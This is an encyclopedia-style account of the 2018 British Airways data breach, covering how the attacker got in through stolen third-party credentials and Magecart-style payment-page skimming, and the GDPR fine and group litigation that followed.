In 2018, the UK flag carrier British Airways suffered a cyberattack in which the personal and financial details of hundreds of thousands of customers who made bookings on BA's website and mobile application were stolen. Subsequent investigations by the United Kingdom Information Commissioner's Office (ICO) found that the attacker was in a position to access personal data relating to about 429,612 individuals, including roughly 244,000 customers whose names, addresses, payment card numbers, expiry dates and card verification values (CVVs) were exposed.

The attacker first accessed British Airways' network in June 2018 using compromised credentials for a third-party supplier and then moved laterally through a Citrix-based remote access system after exploiting system vulnerabilities. They discovered that British Airways had been logging payment card data for certain transactions in plaintext (not encrypted) since 2015, and later modified JavaScript on the airline's payment pages so that card data entered by customers was copied to an attacker-controlled website while bookings appeared to complete normally. Cybersecurity firm RiskIQ, among others, linked the attack to the web-skimming group known as Magecart.

The breach was a high-profile test of the General Data Protection Regulation (GDPR) for a major airline. In 2019 the ICO announced its intention to fine British Airways £183.39 million; after further analysis and consideration of mitigating factors this was reduced to a £20 million penalty issued in October 2020. The incident also led to group litigation on behalf of affected customers, described by claimant law firms as the largest personal-data group action in UK history, which was settled out of court in 2021.

British Airways (BA) is the flag carrier of the United Kingdom. It is headquartered in London, England at Waterside, near its main hub at Heathrow Airport.

At the time of the 2018 data breach, British Airways' reputation had been affected by several high-profile operational disruptions, including a major IT systems outage in May 2017 that led to hundreds of flight cancellations from Heathrow and Gatwick and stranded tens of thousands of passengers worldwide.

The data breach also occurred soon after the General Data Protection Regulation (GDPR) came into force across the European Union on 25 May 2018. GDPR introduced stricter obligations on organisations that act as controllers or processors of personal data and allowed regulators to impose administrative fines of up to 4 percent of annual worldwide turnover or €20 million, whichever is higher.

On 22 June 2018, an attacker gained access to the British Airways network by means of compromised login details—a stolen username and password—from an employee of Swissport, a third-party cargo handler. The compromised account did not have multi-factor authentication (MFA) enabled, a security measure that requires a second step in addition to a password, such as a code sent to a phone. British Airways later found that the attacker had compromised five such Swissport accounts.

The accounts allowed the attacker to access only a limited set of applications and data within a virtual environment provided by the Citrix platform, which British Airways used to let staff and partners run internal applications over the internet. However, the attacker was able to break out of that environment. Having done so, they found a file containing the username and password of a highly privileged user saved to a file that could be accessed by any user of the domain.